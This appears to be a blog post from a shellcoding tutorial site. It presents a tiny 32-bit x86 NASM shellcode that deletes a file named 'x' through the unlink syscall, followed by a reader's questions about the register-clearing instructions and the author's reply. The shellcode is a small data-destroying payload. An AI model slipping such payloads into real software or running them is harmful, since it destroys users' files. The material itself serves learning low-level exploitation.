Just a short one here. This shellcode simply deletes a file with the name x. Have fun.
deletefile.nasm
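```nasm
; Filename: deletefile.nasm
; Author: Daniel Sauder
; Website: https://govolution.wordpress.com
; Tested on: Ubuntu 12.04 / 32Bit
; License http://creativecommons.org/licenses/by-sa/3.0/
; delete file with name x

section .text

global _start

_start:
    push 0x78       ; push x, filename (the zero upper bytes terminate the string)
    mov ebx,esp     ; ebx = pointer to the filename on the stack
    xor eax,eax     ; clear eax so only al needs to be set
    mov al,0xa      ; syscall 10 = unlink
    int 0x80
    mov al,0x1      ; syscall 1 = exit (eax is 0 here if unlink succeeded)
    int 0x80
```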
You can download the code from GitHub.
Hello,
I’m learning x86 and shellcoding (your blog is very useful, thanks) but I didn’t understand a thing in this example: why are you using CDQ?
Thanks a lot,
Chirs
If the EAX register is zero, CDQ can replace xor edx,edx for setting the EDX register to zero too. This shortens the resulting shellcode by one byte.
But you are not using EDX, so why are you clearing it?
thanks
Good point. Bad habit by me deleting all eax, ebx, ecx and edx… had my problems before. ECX is not used too BTW, I corrected the code. Thank you chirs!
you’re welcome 🙂